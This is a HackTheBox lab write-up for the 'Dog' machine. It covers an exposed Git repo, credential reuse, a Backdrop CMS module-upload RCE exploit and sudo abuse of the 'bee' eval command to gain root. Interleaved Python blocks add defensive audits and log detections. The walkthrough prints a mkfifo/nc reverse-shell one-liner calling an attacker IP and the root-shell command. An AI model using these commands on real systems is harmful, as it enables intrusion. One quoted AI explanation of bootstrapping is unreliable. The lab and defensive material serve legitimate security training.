Dog Writeup (HackTheBox Easy Machine)



Overview

Dog is an easy Linux machine from HackTheBox. This box is a great introduction for beginners to several common and key vulnerabilities in the world of ethical hacking.

We start out by discovering an exposed Git repository on the website containing all of its source code. We find some information about the software being used, a potential username and a pair of credentials for the database.

With a technique called “credential stuffing”, we log in as the user we found earlier and get access to the Backdrop CMS dashboard. We search for and find an authenticated RCE exploit that abuses the installation of custom modules. That is how we get the initial foothold on the machine.

After that, we log in as another user with the same password we used earlier and discover we can run Backdrop’s binary “bee” with elevated privileges. We abuse the built-in function “eval” to run arbitrary code as super-user and get a shell as root.


Nmap scan

We start with an Nmap scan.

┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A 10.10.11.58 -T5
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-11 13:09 EDT
Nmap scan report for dog.htb (10.10.11.58)
Host is up (0.047s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-title: Home | Dog
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
Device type: general purpose
Running: Linux 5.X
OS CPE: cpe:/o:linux:linux_kernel:5.0
OS details: Linux 5.0, Linux 5.0 - 5.14
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 1720/tcp)
HOP RTT ADDRESS
1 35.11 ms 10.10.14.1
2 36.36 ms dog.htb (10.10.11.58)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.12 seconds

The Nmap scan shows 2 open ports: port 22 for SSH and port 80 for an HTTP web server running Apache 2.4.41. The scan immediately detected Backdrop CMS (Content Management System) in use, a “robots.txt” file with a couple of disallowed entries, and an exposed Git repository. That is already several potential attack vectors. Don’t forget to add “dog.htb” to your “/etc/hosts”.


Web enumeration

We check the website on port 80. It’s a website about dogs, their care and problems.

Browser plugin “Wappalyzer” also confirms the presence of Backdrop CMS and PHP.


I used FFuF to fuzz for subdomains, but with no luck. Then I used Gobuster to enumerate all the directories on the website.

┌──(kali㉿kali)-[~]
└─$ gobuster dir -u "http://dog.htb" -w /usr/share/wordlists/dirb/common.txt -t 64
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://dog.htb
[+] Method: GET
[+] Threads: 64
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.htaccess (Status: 403) [Size: 272]
/.hta (Status: 403) [Size: 272]
/.git/HEAD (Status: 200) [Size: 23]
/.htpasswd (Status: 403) [Size: 272]
/core (Status: 301) [Size: 301] [--> http://dog.htb/core/]
/files (Status: 301) [Size: 302] [--> http://dog.htb/files/]
/index.php (Status: 200) [Size: 13260]
/layouts (Status: 301) [Size: 304] [--> http://dog.htb/layouts/]
/modules (Status: 301) [Size: 304] [--> http://dog.htb/modules/]
/robots.txt (Status: 200) [Size: 1198]
/server-status (Status: 403) [Size: 272]
/sites (Status: 301) [Size: 302] [--> http://dog.htb/sites/]
/themes (Status: 301) [Size: 303] [--> http://dog.htb/themes/]

Directory brute-forcing revealed a bunch of exposed files and data. “Robots.txt” contained several disallowed entries, but nothing really interesting.

“Robots.txt” is a text file used by websites to communicate with web crawlers and robots about which parts of the site should not be accessed or indexed. (Blackbox.ai)


Git repository

I was particularly interested in the “.git” directory, which indicated an exposed Git repository that can contain source code and other valuable information. I used the Python tool “GitHack” to dump all the files from the repository. Those were the same directories as we saw in Gobuster.

┌──(kali㉿kali)-[~]
└─$ python3 /opt/GitHack/GitHack.py -u "http://dog.htb/.git/"
[+] Download and parse index file ...
[+] LICENSE.txt
[+] README.md
[+] core/.jshintignore
[+] core/.jshintrc
[+] core/authorize.php
[+] core/cron.php
------------------------------
LOT OF FILES
------------------------------

After looking at the files, we can uncover several helpful pieces of information.


In the file “dog.htb/core/modules/config/config.info” we can find the version of Backdrop CMS being used: 1.27.1. This information can be found in any module. I just checked “config” first.

In another file, “dog.htb/settings.php”, we can find credentials for the internal MySQL database.

And lastly, in the file “files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json” there was an exposed email address, “tiffany@dog.htb”, giving us the potential username “tiffany”.
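
A defender-side check for the findings above, added here as an example and not part of the original writeup or of Backdrop: it walks a document root before deployment and reports version-control metadata and settings files that hold a database URL with an inline password. The function names, the placeholder list and the `scheme://user:password@host` pattern are assumptions, and the tree in `demo()` is constructed.

```python
import os
import re
import tempfile

VCS_DIRS = {".git", ".svn", ".hg"}
SCAN_SUFFIXES = (".php", ".json", ".ini", ".env")
# Assumed credential shape: scheme://user:password@host, as in
# $database = 'mysql://user:password@localhost/dbname';
DB_URL = re.compile(r"\b(?:mysql|mariadb|pgsql)://[^:/\s'\"]+:([^@\s'\"]+)@")
PLACEHOLDERS = {"pass", "password", "changeme"}

def audit_webroot(root):
    """Return sorted (kind, relative_path) findings for one document root."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        for d in list(dirnames):
            if d in VCS_DIRS:
                rel = os.path.relpath(os.path.join(dirpath, d), root)
                findings.append(("vcs-metadata", rel))
                dirnames.remove(d)  # report the repository once, do not descend
        for name in filenames:
            if not name.endswith(SCAN_SUFFIXES):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, encoding="utf-8", errors="replace") as fh:
                    text = fh.read()
            except OSError:
                continue  # unreadable file: skip rather than abort the audit
            passwords = [m.group(1) for m in DB_URL.finditer(text)]
            if any(p.lower() not in PLACEHOLDERS for p in passwords):
                findings.append(("db-credential", os.path.relpath(path, root)))
    return sorted(findings)

def demo():
    """Audit a constructed tree shaped like the web root in the writeup."""
    with tempfile.TemporaryDirectory() as root:
        os.makedirs(os.path.join(root, ".git"))
        os.makedirs(os.path.join(root, "core"))
        files = {
            ".git/HEAD": "ref: refs/heads/master\n",
            "settings.php": "<?php\n$database = 'mysql://root:Constructed-Pw1@127.0.0.1/backdrop';\n",
            "core/example.settings.php": "<?php\n$database = 'mysql://user:pass@localhost/db';\n",
            "index.php": "<?php // constructed file without secrets\n",
        }
        for rel, body in files.items():
            with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
                fh.write(body)
        return audit_webroot(root)

if __name__ == "__main__":
    for kind, rel in demo():
        print(f"{kind}: {rel}")
```

Run as a deployment gate, a non-empty result means the web root should not be published as it is.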


Logging into website as user “tiffany”

Honourable mention: There was a suspicious parameter “q” in the URL as I moved through directories, containing the exact directory I was visiting. But soon I realized there was no need to play with it.

There was a login page and I tried some basic stuff like appending ‘ to check for SQL injection and testing whether username enumeration was possible based on the errors I was given (it was possible: a valid username like “tiffany” got a different error). But when I tried to log in as “tiffany” with the password I found for the internal MySQL database, I got in. This is a perfect example of credential stuffing.


Getting foothold via RCE exploit

The last thing to take into consideration was the exposed version of Backdrop CMS. When I searched for version 1.27.1, I quickly found an authenticated Remote Code Execution exploit on exploit-db.

The exploit involves creating a malicious module within Backdrop CMS. By crafting a module that includes a “.info” file and a PHP script (”shell.php”), an attacker can upload this module to the CMS. Once uploaded and activated, the “shell.php” script can be accessed to execute system commands provided by the attacker. (ChatGPT)


I ran the Python exploit and it generated “shell.zip”. I had to change the suffix from “.zip” to, for example, “.tar.gz”, because the module installer doesn’t accept zip archives.

┌──(kali㉿kali)-[~]
└─$ python3 exploit.py "dog.htb"
Backdrop CMS 1.27.1 - Remote Command Execution Exploit
Evil module generating...
Evil module generated! shell.zip
Go to dog.htb/admin/modules/install and upload the shell.zip for Manual Installation.
Your shell address: dog.htb/modules/shell/shell.php


I was looking for my “shell” module in the module list but didn’t find it. After a while, I found it in the “dog.htb/modules” directory.

You have to run “shell.php” with the “cmd” parameter containing your command immediately, because the box is programmed to delete these files after the first execution. Also remember to use the shell for the “wrong version of netcat” with “mkfifo”, otherwise the shell will not function properly.

For example: “http://dog.htb/modules/shell/shell.php?cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.250 1234 >/tmp/f”.

After that we get a shell as user “www-data”. Don’t forget to stabilize your shell with Python3 Pty.
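
How this foothold looks from the defender's side, as an added example that is not part of the original writeup: a detection over Apache access-log lines that flags PHP served directly from an extension directory and correlates it with an earlier POST to the module installer from the same client. The log lines are constructed, and the rule assumes that legitimate page requests on this site go through “/index.php”.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Apache combined log format: client, timestamp, request line, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')
# Assumption: on this site PHP under extension directories is never requested
# directly, because normal page requests are served through /index.php.
DIRECT_PHP = re.compile(r"^/(?:modules|themes|layouts)/.+\.php$", re.IGNORECASE)
SHELL_META = re.compile(r"[;|&`$<>]")
INSTALL_PATH = "admin/modules/install"  # upload page named in the exploit output

# Constructed sample lines (not captured from the box).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Mar/2025:15:50:01 +0000] "GET /index.php?q=user/login&destination=node/1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.10.14.250 - - [14/Mar/2025:15:52:40 +0000] "POST /?q=admin/modules/install HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
    '10.10.14.250 - - [14/Mar/2025:15:53:10 +0000] "GET /modules/shell/shell.php?cmd=id%3Bwhoami HTTP/1.1" 200 64 "-" "curl/8.5.0"',
    '192.0.2.10 - - [14/Mar/2025:15:54:00 +0000] "GET /modules/views/views.php HTTP/1.1" 404 272 "-" "Mozilla/5.0"',
]

def detect_extension_webshell(lines):
    """Return (client, path, reasons) for PHP served straight from extension dirs."""
    installers = set()  # clients that posted to the module installer
    alerts = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        client, _ts, method, target, status = m.groups()
        url = urlsplit(target)
        path = unquote(url.path)
        params = parse_qsl(url.query, keep_blank_values=True)
        if method == "POST" and (INSTALL_PATH in path
                                 or any(INSTALL_PATH in v for _, v in params)):
            installers.add(client)
        if not (DIRECT_PHP.match(path) and status == "200"):
            continue
        reasons = ["php-served-from-extension-dir"]
        if any(SHELL_META.search(v) for _, v in params):
            reasons.append("shell-metacharacters-in-parameter")
        if client in installers:
            reasons.append("client-used-module-installer")
        alerts.append((client, path, reasons))
    return alerts

if __name__ == "__main__":
    for alert in detect_extension_webshell(SAMPLE_LOG):
        print(alert)
```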


Accessing MySQL database

I tried to look into the home directory to see which users we have. There were 2 users, “jobert” and “johncusack”; the latter also had the user flag, but we can’t read it.

www-data@dog:/home$ ls
jobert johncusack
www-data@dog:/home$ ls -la jobert
ls -la jobert
total 28
drwxr-xr-x 4 jobert jobert 4096 Feb 7 15:59 .
drwxr-xr-x 4 root root 4096 Aug 15 2024 ..
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .bash_history -> /dev/null
-rw-r--r-- 1 jobert jobert 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 jobert jobert 3771 Feb 25 2020 .bashrc
drwx------ 2 jobert jobert 4096 Jul 8 2024 .cache
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .mysql_history -> /dev/null
-rw-r--r-- 1 jobert jobert 807 Feb 25 2020 .profile
drwx------ 2 jobert jobert 4096 Jul 8 2024 .ssh
-rw-r--r-- 1 jobert jobert 0 Jul 8 2024 .sudo_as_admin_successful
www-data@dog:/home$ ls -la johncusack
ls -la johncusack
total 28
drwxr-xr-x 3 johncusack johncusack 4096 Feb 7 15:59 .
drwxr-xr-x 4 root root 4096 Aug 15 2024 ..
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .bash_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack 220 Aug 15 2024 .bash_logout
-rw-r--r-- 1 johncusack johncusack 3771 Aug 15 2024 .bashrc
drwx------ 2 johncusack johncusack 4096 Aug 16 2024 .cache
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .mysql_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack 807 Aug 15 2024 .profile
-rw-r----- 1 root johncusack 33 Mar 13 13:13 user.txt


I remembered we had already discovered credentials for the internal MySQL database, to which we now have access. There was a database with an unusual name called “backdrop”. I found a table called “users” and dumped the information. There was a hashed password for user “jobert”.

www-data@dog:/home$ which mysql
/usr/bin/mysql
www-data@dog:/home$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 5981
Server version: 8.0.41-0ubuntu0.20.04.1 (Ubuntu)

Copyright (c) 2000, 2025, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

mysql> show databases;
+--------------------+
| Database |
+--------------------+
| backdrop |
| information_schema |
| mysql |
| performance_schema |
| sys |
+--------------------+
5 rows in set (0.00 sec)

Dumped password hashes for all the users

After trying to crack the hash with Hashcat, I was NOT able to crack it. So I started to look elsewhere, but that was not necessary.


Logging in as “johncusack” & user flag

After this failure, I tried to re-use tiffany’s password once again for our 2 users. And to my delight, I logged in as “johncusack”. Sometimes it’s just best not to overthink things, especially when you are dealing with easy machines. Nothing was stopping me from printing out the user flag.

www-data@dog:/home$ su jobert
Password:
su: Authentication failure
www-data@dog:/home$ su johncusack
Password:
johncusack@dog:/home$ whoami
johncusack
johncusack@dog:/home$ pwd
/home
johncusack@dog:/home$ cd johncusack/
johncusack@dog:~$ ls -la
total 32
drwxr-xr-x 4 johncusack johncusack 4096 Mar 13 16:29 .
drwxr-xr-x 4 root root 4096 Aug 15 2024 ..
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .bash_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack 220 Aug 15 2024 .bash_logout
-rw-r--r-- 1 johncusack johncusack 3771 Aug 15 2024 .bashrc
drwx------ 2 johncusack johncusack 4096 Aug 16 2024 .cache
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .mysql_history -> /dev/null
-rw-r--r-- 1 johncusack johncusack 807 Aug 15 2024 .profile
drwxrwxr-x 2 johncusack johncusack 4096 Mar 13 16:29 .ssh
-rw-r----- 1 root johncusack 33 Mar 13 15:41 user.txt
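
The “su” attempts above leave a high-signal trail, shown here as an added detection example that is not part of the original writeup: a service account such as “www-data” should never call “su”, and a success that follows a failure against a different user points to a reused password. The log lines are constructed and the message format (util-linux “su” writing to auth.log) is an assumption about the host.

```python
import re

# util-linux su logs "(to TARGET) CALLER on TTY", with "FAILED SU " first on failure.
SU_RE = re.compile(r"\bsu(?:\[\d+\])?: (FAILED SU )?\(to (\S+)\) (\S+) on (\S+)")
SERVICE_ACCOUNTS = {"www-data", "mysql", "nobody"}  # never log in interactively

# Constructed auth.log lines modelled on the su attempts in the writeup.
SAMPLE_AUTH_LOG = [
    "Mar 13 15:40:02 dog su: FAILED SU (to jobert) www-data on pts/0",
    "Mar 13 15:40:11 dog su: (to johncusack) www-data on pts/0",
    "Mar 13 15:45:00 dog su: (to jobert) root on pts/1",
]

def detect_service_account_su(lines):
    """Return (severity, caller, target) for every su run by a service account."""
    alerts = []
    failures = {}  # caller -> targets that rejected the password
    for line in lines:
        m = SU_RE.search(line)
        if not m:
            continue
        failed, target, caller, _tty = m.groups()
        if caller not in SERVICE_ACCOUNTS:
            continue
        if failed:
            failures.setdefault(caller, set()).add(target)
            alerts.append(("medium", caller, target))
        else:
            # Success after failures against other users suggests a reused password.
            others = failures.get(caller, set()) - {target}
            alerts.append(("critical" if others else "high", caller, target))
    return alerts

if __name__ == "__main__":
    for alert in detect_service_account_su(SAMPLE_AUTH_LOG):
        print(alert)
```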


Privilege Escalation via binary “bee” & root flag

As usual, we check our sudo permissions and find out that we can run some binary “bee” with sudo. This file was actually a link to a PHP script in the unusual “/backdrop_tool/bee” directory.

johncusack@dog:~$ sudo -l
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
johncusack@dog:~$ ls -la /usr/local/bin/bee
lrwxrwxrwx 1 root root 26 Jul 9 2024 /usr/local/bin/bee -> /backdrop_tool/bee/bee.php
johncusack@dog:~$ ls -la /backdrop_tool/bee/bee.php
-rwxr-xr-x 1 root root 2905 Jul 9 2024 /backdrop_tool/bee/bee.php

Bee is a command line utility for Backdrop CMS. It includes commands that allow developers to interact with Backdrop sites. (backdropcms.org)


I checked the help page of the binary and tried a couple of commands. I found a very interesting and potentially helpful command, “eval”, which executes arbitrary PHP code. However, I encountered an error very quickly after running the binary with the “eval” command.

“eval” command which executes arbitrary code
johncusack@dog:/tmp$ sudo /usr/local/bin/bee eval "system('/bin/bash')"

✘ The required bootstrap level for 'eval' is not ready.

johncusack@dog:/tmp$


The error stated that some bootstrap level is not ready.

The concept of bootstrapping in software development is derived from the idea of starting with a minimal or basic set of tools and gradually building up more sophisticated systems. In the context of a binary, it involves using an initial binary or tool to create or compile a new, more advanced binary. (ChatGPT)

This seemed to me like there’s some missing prerequisite. I re-read the help page and another command caught my attention, possibly solving this issue.

“--root” option which specifies the directory of Backdrop installation

The “--root” option is used to specify the directory of the Backdrop installation, which turned out to be our missing prerequisite.


I specified the path “/var/www/html”. This is the root directory of the web server.

johncusack@dog:/tmp$ ls -la /var/www/html
total 108
drwxrwxr-x 9 www-data www-data 4096 Mar 14 16:55 .
drwxr-xr-x 3 root root 4096 Jul 8 2024 ..
-rw-r--r-- 1 www-data www-data 48 Mar 14 16:53 a.sh
-rw-r--r-- 1 www-data www-data 48 Mar 14 16:53 a.sh.1
drwxrwx--- 9 www-data www-data 4096 Jul 8 2024 core
drwxrwx--- 7 www-data www-data 4096 Jul 9 2024 files
drwxr-xr-x 8 root root 4096 Feb 7 21:22 .git
-rwxrwx--- 1 www-data www-data 578 Mar 7 2024 index.php
drwxrwx--- 2 www-data www-data 4096 Jul 8 2024 layouts
-rwxrwx--- 1 www-data www-data 18092 Mar 7 2024 LICENSE.txt
drwxrwx--- 2 www-data www-data 4096 Mar 14 17:28 modules
-rwxrwx--- 1 www-data www-data 5285 Mar 7 2024 README.md
-rwxrwx--- 1 www-data www-data 1198 Mar 7 2024 robots.txt
-rwxrwx--- 1 www-data www-data 21732 Jul 8 2024 settings.php
-rw-r--r-- 1 www-data www-data 350 Mar 14 15:53 shell.php
drwxrwx--- 2 www-data www-data 4096 Jul 8 2024 sites
drwxrwx--- 2 www-data www-data 4096 Jul 8 2024 themes

With that in place, I re-ran the “bee” binary and I got the root shell.

johncusack@dog:/tmp$ sudo /usr/local/bin/bee --root=/var/www/html eval "system('/bin/bash')"
[sudo] password for johncusack:
root@dog:/var/www/html# whoami
root
root@dog:/var/www/html# pwd
/var/www/html
root@dog:/var/www/html# cd /root
root@dog:~# ls -la
total 44
drwx------ 5 root root 4096 Mar 14 14:37 .
drwxr-xr-x 19 root root 4096 Feb 7 18:31 ..
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .bash_history -> /dev/null
-rw-r--r-- 1 root root 3106 Dec 5 2019 .bashrc
drwx------ 2 root root 4096 Jan 29 15:49 .cache
-rw-r--r-- 1 root root 94 Aug 15 2024 .gitconfig
drwxr-xr-x 3 root root 4096 Jul 9 2024 .local
lrwxrwxrwx 1 root root 9 Feb 7 15:59 .mysql_history -> /dev/null
-rw-r--r-- 1 root root 161 Dec 5 2019 .profile
-rw-r----- 1 root root 33 Mar 14 14:37 root.txt
-rw-r--r-- 1 root root 66 Jul 11 2024 .selected_editor
drwx------ 2 root root 4096 Jul 8 2024 .ssh
-rw-r--r-- 1 root root 165 Feb 7 15:59 .wget-hsts

And finally, nothing was stopping me from claiming the victory and getting the root flag.
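
An audit for the sudo rule abused above, added as an example and not taken from the original writeup or from bee: it reads `sudo -l` output, resolves each permitted command through symlinks and flags targets that are interpreted scripts, since a script tool that can evaluate code gives its caller the privileges of the rule. The function names and the interpreter list are assumptions, and `demo()` rebuilds the symlink layout from the listing above with a constructed stand-in file.

```python
import os
import re
import tempfile

INTERPRETERS = {"php", "python", "python3", "perl", "ruby", "node", "sh", "bash"}
# Rule lines of `sudo -l` look like "(ALL : ALL) /usr/local/bin/bee".
RULE_RE = re.compile(r"^\s*\(([^)]*)\)\s*(?:[A-Z_]+:\s*)*(/\S+)")

def shebang_interpreter(path):
    """Return the interpreter named in a script's shebang line, else None."""
    try:
        with open(path, "rb") as fh:
            first = fh.readline(256)
    except OSError:
        return None
    if not first.startswith(b"#!"):
        return None
    parts = first[2:].decode("utf-8", "replace").split()
    if parts and os.path.basename(parts[0]) == "env":
        parts = [p for p in parts[1:] if not p.startswith("-")]
    return os.path.basename(parts[0]) if parts else None

def audit_sudo_listing(listing):
    """Flag sudo rules whose command is a symlink or an interpreted script."""
    findings = []
    for line in listing.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        runas, cmd = m.group(1).strip(), m.group(2)
        target = os.path.realpath(cmd)
        issues = ["symlink"] if os.path.islink(cmd) else []
        interp = shebang_interpreter(target)
        if interp in INTERPRETERS:
            issues.append("script:" + interp)
        if issues:
            findings.append((cmd, runas, target, issues))
    return findings

def demo():
    """Recreate the symlink layout from the writeup in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.realpath(tmp)
        script = os.path.join(root, "backdrop_tool", "bee", "bee.php")
        link = os.path.join(root, "usr", "local", "bin", "bee")
        os.makedirs(os.path.dirname(script))
        os.makedirs(os.path.dirname(link))
        with open(script, "w") as fh:
            fh.write("#!/usr/bin/env php\n<?php // constructed stand-in\n")
        os.symlink(script, link)
        listing = f"User johncusack may run the following commands on dog:\n    (ALL : ALL) {link}\n"
        return [(os.path.relpath(t, root), i) for _, _, t, i in audit_sudo_listing(listing)]

if __name__ == "__main__":
    print(demo())
```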


Summary

Dog is an easy machine from HackTheBox. The box plays with a couple of common real-world vulnerabilities, like exposed source code and password reuse. It starts by showcasing the dangers of leaving your Git repository exposed on your website with all the source code and hardcoded credentials. It also shows how legacy CMS (Content Management System) versions (Backdrop in this case) are vulnerable to unpatched bugs, allowing for critical vulnerabilities like RCE (Remote Code Execution). After getting a shell, the box continues to showcase what might happen if you allow low-privileged users to run binaries as super-user, especially if the binary allows for code execution. This machine taught me not to overthink things too much, as I got stuck a couple of times on fairly simple things, like trying to crack hashes from the internal MySQL database. So try the basic stuff first before going for complex solutions. Overall, a very instructive and fun box.
